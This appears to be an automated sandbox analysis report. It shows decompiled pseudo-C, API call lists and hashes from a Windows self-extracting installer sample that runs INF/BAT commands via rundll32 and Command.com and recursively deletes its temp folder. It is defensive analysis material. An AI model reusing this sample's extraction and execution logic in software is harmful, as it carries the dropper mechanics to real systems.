                                                                                                                                                                                                        0x00bc1dde
                                                                                                                                                                                                        0x00bc1d64
                                                                                                                                                                                                        0x00bc1d64
                                                                                                                                                                                                        0x00bc1d67
                                                                                                                                                                                                        0x00bc1d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1c67
                                                                                                                                                                                                        0x00bc1c67
                                                                                                                                                                                                        0x00bc1c6d
                                                                                                                                                                                                        0x00bc1c72
                                                                                                                                                                                                        0x00bc1c74
                                                                                                                                                                                                        0x00bc1c74
                                                                                                                                                                                                        0x00bc1c8e
                                                                                                                                                                                                        0x00bc1c99
                                                                                                                                                                                                        0x00bc1cc0
                                                                                                                                                                                                        0x00bc1cf8
                                                                                                                                                                                                        0x00bc1d07
                                                                                                                                                                                                        0x00bc1d23
                                                                                                                                                                                                        0x00bc1d09
                                                                                                                                                                                                        0x00bc1d14
                                                                                                                                                                                                        0x00bc1d1b
                                                                                                                                                                                                        0x00bc1d1b
                                                                                                                                                                                                        0x00bc1d2b
                                                                                                                                                                                                        0x00bc1d2d
                                                                                                                                                                                                        0x00bc1d2d
                                                                                                                                                                                                        0x00bc1d38
                                                                                                                                                                                                        0x00bc1d39
                                                                                                                                                                                                        0x00bc1d46
                                                                                                                                                                                                        0x00bc1cc2
                                                                                                                                                                                                        0x00bc1cc2
                                                                                                                                                                                                        0x00bc1ccc
                                                                                                                                                                                                        0x00bc1cce
                                                                                                                                                                                                        0x00bc1cce
                                                                                                                                                                                                        0x00bc1cdb
                                                                                                                                                                                                        0x00bc1ce6
                                                                                                                                                                                                        0x00bc1cee
                                                                                                                                                                                                        0x00bc1cee
                                                                                                                                                                                                        0x00bc1e89
                                                                                                                                                                                                        0x00bc1e91
                                                                                                                                                                                                        0x00bc1e92
                                                                                                                                                                                                        0x00bc1e94
                                                                                                                                                                                                        0x00bc1e97
                                                                                                                                                                                                        0x00bc1ea4
                                                                                                                                                                                                        0x00bc1ea4
                                                                                                                                                                                                        0x00bc1c61
                                                                                                                                                                                                        0x00bc1c07
                                                                                                                                                                                                        0x00bc1bd3
                                                                                                                                                                                                        0x00bc1b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00BC1BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00BC1BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00BC1C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00BC1C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00BC1140,00000000,00000008,?), ref: 00BC1CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00BC1D1B
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-2112662285
                                                                                                                                                                                                        • Opcode ID: d0e639f956b830f32e1fbc52dc05897b4cb9d26c830f014d52a4a7a65f8aaafc
                                                                                                                                                                                                        • Instruction ID: 2d2995dbcda10c980aea3090b2361eead0a98e825033542b17ee8a9be65821cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0e639f956b830f32e1fbc52dc05897b4cb9d26c830f014d52a4a7a65f8aaafc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDA12870A002186BEB209B2CCC45FEA77E9DB57310F144AEDE556F32D2DBB49D858B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 bc2f1d-bc2f3d 407 bc2f6c-bc2f73 call bc5164 406->407 408 bc2f3f-bc2f46 406->408 416 bc2f79-bc2f80 call bc55a0 407->416 417 bc3041 407->417 410 bc2f5f-bc2f66 call bc3a3f 408->410 411 bc2f48 call bc51e5 408->411 410->407 410->417 418 bc2f4d-bc2f4f 411->418 416->417 425 bc2f86-bc2fbe GetSystemDirectoryA call bc658a LoadLibraryA 416->425 421 bc3043-bc3053 call bc6ce0 417->421 418->417 419 bc2f55-bc2f5d 418->419 419->407 419->410 428 bc2ff7-bc3004 FreeLibrary 425->428 429 bc2fc0-bc2fd4 GetProcAddress 425->429 430 bc3006-bc300c 428->430 431 bc3017-bc3024 SetCurrentDirectoryA 428->431 429->428 432 bc2fd6-bc2fee DecryptFileA 429->432 430->431 433 bc300e call bc621e 430->433 434 bc3054-bc305a 431->434 435 bc3026-bc303c call bc44b9 call bc6285 431->435 432->428 441 bc2ff0-bc2ff5 432->441 445 bc3013-bc3015 433->445 437 bc305c call bc3b26 434->437 438 bc3065-bc306c 434->438 435->417 447 bc3061-bc3063 437->447 443 bc307c-bc3089 438->443 444 bc306e-bc3075 call bc256d 438->444 441->428 449 bc308b-bc3091 443->449 450 bc30a1-bc30a9 443->450 454 bc307a 444->454 445->417 445->431 447->417 447->438 449->450 455 bc3093 call bc3ba2 449->455 452 bc30ab-bc30ad 450->452 453 bc30b4-bc30b7 450->453 452->453 457 bc30af call bc4169 452->457 453->421 454->443 460 bc3098-bc309a 455->460 457->453 460->417 461 bc309c 460->461 461->450
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t9 ^ _t46;
				if( *0xbc8a38 != 0) {
					L5:
					_t11 = E00BC5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00BC6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00BC55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00BC658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xbca288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xbc8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xbc8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xbc8d48 & 0x000000c0;
									if(( *0xbc8d48 & 0x000000c0) == 0) {
										_t41 =  *0xbc9a40; // 0x3, executed
										_t26 = E00BC256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xbc8a24; // 0x0
									 *0xbc9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xbc8a38;
										if( *0xbc8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00BC4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xbc9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00BC3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xbc8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00BC3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00BC44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xbc9124 = E00BC6285();
							goto L16;
						}
						_t59 =  *0xbc9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00BC621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xbc8a24;
				if( *0xbc8a24 != 0) {
					L4:
					_t34 = E00BC3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00BC51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xbc8a38;
				if( *0xbc8a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                        0x00bc2f1d
                                                                                                                                                                                                        0x00bc2f28
                                                                                                                                                                                                        0x00bc2f2f
                                                                                                                                                                                                        0x00bc2f3d
                                                                                                                                                                                                        0x00bc2f6c
                                                                                                                                                                                                        0x00bc2f6c
                                                                                                                                                                                                        0x00bc2f71
                                                                                                                                                                                                        0x00bc2f73
                                                                                                                                                                                                        0x00bc3041
                                                                                                                                                                                                        0x00bc3041
                                                                                                                                                                                                        0x00bc3043
                                                                                                                                                                                                        0x00bc3053
                                                                                                                                                                                                        0x00bc3053
                                                                                                                                                                                                        0x00bc2f79
                                                                                                                                                                                                        0x00bc2f80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2f86
                                                                                                                                                                                                        0x00bc2f86
                                                                                                                                                                                                        0x00bc2f93
                                                                                                                                                                                                        0x00bc2f9e
                                                                                                                                                                                                        0x00bc2fa0
                                                                                                                                                                                                        0x00bc2fa6
                                                                                                                                                                                                        0x00bc2fb8
                                                                                                                                                                                                        0x00bc2fba
                                                                                                                                                                                                        0x00bc2fbe
                                                                                                                                                                                                        0x00bc2fc6
                                                                                                                                                                                                        0x00bc2fcc
                                                                                                                                                                                                        0x00bc2fd4
                                                                                                                                                                                                        0x00bc2fd6
                                                                                                                                                                                                        0x00bc2fd8
                                                                                                                                                                                                        0x00bc2fe0
                                                                                                                                                                                                        0x00bc2fe6
                                                                                                                                                                                                        0x00bc2fee
                                                                                                                                                                                                        0x00bc2ff0
                                                                                                                                                                                                        0x00bc2ff5
                                                                                                                                                                                                        0x00bc2ff5
                                                                                                                                                                                                        0x00bc2fee
                                                                                                                                                                                                        0x00bc2fd4
                                                                                                                                                                                                        0x00bc2ff8
                                                                                                                                                                                                        0x00bc2ffe
                                                                                                                                                                                                        0x00bc3004
                                                                                                                                                                                                        0x00bc3017
                                                                                                                                                                                                        0x00bc301c
                                                                                                                                                                                                        0x00bc3024
                                                                                                                                                                                                        0x00bc3054
                                                                                                                                                                                                        0x00bc305a
                                                                                                                                                                                                        0x00bc3065
                                                                                                                                                                                                        0x00bc3065
                                                                                                                                                                                                        0x00bc306c
                                                                                                                                                                                                        0x00bc306e
                                                                                                                                                                                                        0x00bc3075
                                                                                                                                                                                                        0x00bc307a
                                                                                                                                                                                                        0x00bc307a
                                                                                                                                                                                                        0x00bc307c
                                                                                                                                                                                                        0x00bc3081
                                                                                                                                                                                                        0x00bc3087
                                                                                                                                                                                                        0x00bc3089
                                                                                                                                                                                                        0x00bc30a1
                                                                                                                                                                                                        0x00bc30a1
                                                                                                                                                                                                        0x00bc30a9
                                                                                                                                                                                                        0x00bc30ab
                                                                                                                                                                                                        0x00bc30ad
                                                                                                                                                                                                        0x00bc30af
                                                                                                                                                                                                        0x00bc30af
                                                                                                                                                                                                        0x00bc30ad
                                                                                                                                                                                                        0x00bc30b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc308b
                                                                                                                                                                                                        0x00bc308b
                                                                                                                                                                                                        0x00bc3091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3093
                                                                                                                                                                                                        0x00bc3098
                                                                                                                                                                                                        0x00bc309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc309c
                                                                                                                                                                                                        0x00bc3089
                                                                                                                                                                                                        0x00bc305c
                                                                                                                                                                                                        0x00bc3061
                                                                                                                                                                                                        0x00bc3063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3063
                                                                                                                                                                                                        0x00bc302b
                                                                                                                                                                                                        0x00bc3032
                                                                                                                                                                                                        0x00bc303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc303c
                                                                                                                                                                                                        0x00bc3006
                                                                                                                                                                                                        0x00bc300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc300e
                                                                                                                                                                                                        0x00bc3015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3015
                                                                                                                                                                                                        0x00bc2f80
                                                                                                                                                                                                        0x00bc2f3f
                                                                                                                                                                                                        0x00bc2f46
                                                                                                                                                                                                        0x00bc2f5f
                                                                                                                                                                                                        0x00bc2f5f
                                                                                                                                                                                                        0x00bc2f64
                                                                                                                                                                                                        0x00bc2f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2f66
                                                                                                                                                                                                        0x00bc2f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2f55
                                                                                                                                                                                                        0x00bc2f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00BC2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00BC2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00BC2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00BC2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC301C
                                                                                                                                                                                                          • Part of subcall function 00BC51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00BC2F4D,?,00000002,00000000), ref: 00BC5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-1002207402
                                                                                                                                                                                                        • Opcode ID: e6fc8df0a4533ffc64e0233fd3f0f2023d3c50e37e574ad03e4bf717d41e43fb
                                                                                                                                                                                                        • Instruction ID: 95d96beb5cb4843c7acc51ec99bb78238dc33a0c8cb41ed65154e02c827e73eb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6fc8df0a4533ffc64e0233fd3f0f2023d3c50e37e574ad03e4bf717d41e43fb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7041D532A006099BDB30AB719C49F6A33E8EB58B55F4040EDF945D3192EF74CE80CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC2390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00BC2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xbc8004; // 0x9f7d84ca
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00BC6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00BC1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00BC16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00BC1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00BC16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00BC16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00BC658A( &_v280, 0x104, 0xbc1140);
								E00BC2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                        0x00bc2398
                                                                                                                                                                                                        0x00bc239e
                                                                                                                                                                                                        0x00bc23a3
                                                                                                                                                                                                        0x00bc23a5
                                                                                                                                                                                                        0x00bc23ae
                                                                                                                                                                                                        0x00bc23b3
                                                                                                                                                                                                        0x00bc24cb
                                                                                                                                                                                                        0x00bc24d2
                                                                                                                                                                                                        0x00bc24d3
                                                                                                                                                                                                        0x00bc24d4
                                                                                                                                                                                                        0x00bc24df
                                                                                                                                                                                                        0x00bc23c2
                                                                                                                                                                                                        0x00bc23d1
                                                                                                                                                                                                        0x00bc23db
                                                                                                                                                                                                        0x00bc23e4
                                                                                                                                                                                                        0x00bc23f6
                                                                                                                                                                                                        0x00bc23fc
                                                                                                                                                                                                        0x00bc2401
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2407
                                                                                                                                                                                                        0x00bc2407
                                                                                                                                                                                                        0x00bc2408
                                                                                                                                                                                                        0x00bc2411
                                                                                                                                                                                                        0x00bc241f
                                                                                                                                                                                                        0x00bc247a
                                                                                                                                                                                                        0x00bc2483
                                                                                                                                                                                                        0x00bc2495
                                                                                                                                                                                                        0x00bc24a3
                                                                                                                                                                                                        0x00bc2421
                                                                                                                                                                                                        0x00bc242f
                                                                                                                                                                                                        0x00bc2453
                                                                                                                                                                                                        0x00bc245d
                                                                                                                                                                                                        0x00bc2466
                                                                                                                                                                                                        0x00bc2472
                                                                                                                                                                                                        0x00bc2472
                                                                                                                                                                                                        0x00bc242f
                                                                                                                                                                                                        0x00bc24af
                                                                                                                                                                                                        0x00bc24b5
                                                                                                                                                                                                        0x00bc24be
                                                                                                                                                                                                        0x00bc24c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc24c5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00BC8A3A,00BC11F4,00BC8A3A,00000000,?,?), ref: 00BC23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00BC11F8), ref: 00BC2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00BC11FC), ref: 00BC243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00BC2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BC24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00BC24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00BC24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00BC8A3A), ref: 00BC24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 2d3ebd1a4bbe52eb108f313b213e6606518fe6241ec17bd4b01b0c097d7e1580
                                                                                                                                                                                                        • Instruction ID: 1a4f79c5680d68a8bf32536695fdf74e8f0cde2de04db8403120d222406c9cf7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d3ebd1a4bbe52eb108f313b213e6606518fe6241ec17bd4b01b0c097d7e1580
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F3181316046449BD324EBA8CC89FEB73ECAFC9345F044D6DB59593291EF3499098762
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00BC2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xbca288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xbc9124 = 0;
				if(E00BC2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00BC2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00BC52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xbc8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xbc9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00BC1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xbc8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xbc9124; // 0x0
				return _t7;
			}


















                                                                                                                                                                                                        0x00bc2c03
                                                                                                                                                                                                        0x00bc2c0d
                                                                                                                                                                                                        0x00bc2c18
                                                                                                                                                                                                        0x00bc2c20
                                                                                                                                                                                                        0x00bc2c2e
                                                                                                                                                                                                        0x00bc2c32
                                                                                                                                                                                                        0x00bc2c36
                                                                                                                                                                                                        0x00bc2c3d
                                                                                                                                                                                                        0x00bc2c43
                                                                                                                                                                                                        0x00bc2c45
                                                                                                                                                                                                        0x00bc2c47
                                                                                                                                                                                                        0x00bc2c49
                                                                                                                                                                                                        0x00bc2c4e
                                                                                                                                                                                                        0x00bc2c4e
                                                                                                                                                                                                        0x00bc2c47
                                                                                                                                                                                                        0x00bc2c32
                                                                                                                                                                                                        0x00bc2c20
                                                                                                                                                                                                        0x00bc2c50
                                                                                                                                                                                                        0x00bc2c54
                                                                                                                                                                                                        0x00bc2c57
                                                                                                                                                                                                        0x00bc2c64
                                                                                                                                                                                                        0x00bc2c66
                                                                                                                                                                                                        0x00bc2c6b
                                                                                                                                                                                                        0x00bc2c6d
                                                                                                                                                                                                        0x00bc2c74
                                                                                                                                                                                                        0x00bc2c76
                                                                                                                                                                                                        0x00bc2c7c
                                                                                                                                                                                                        0x00bc2c7e
                                                                                                                                                                                                        0x00bc2c87
                                                                                                                                                                                                        0x00bc2c89
                                                                                                                                                                                                        0x00bc2c89
                                                                                                                                                                                                        0x00bc2c87
                                                                                                                                                                                                        0x00bc2c7c
                                                                                                                                                                                                        0x00bc2c74
                                                                                                                                                                                                        0x00bc2c8e
                                                                                                                                                                                                        0x00bc2c95
                                                                                                                                                                                                        0x00bc2c98
                                                                                                                                                                                                        0x00bc2c98
                                                                                                                                                                                                        0x00bc2c9e
                                                                                                                                                                                                        0x00bc2ca7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00BC6BB0,00BC0000,00000000,00000002,0000000A), ref: 00BC2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00BC6BB0,00BC0000,00000000,00000002,0000000A), ref: 00BC2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00BC2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00BC6BB0,00BC0000,00000000,00000002,0000000A), ref: 00BC2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
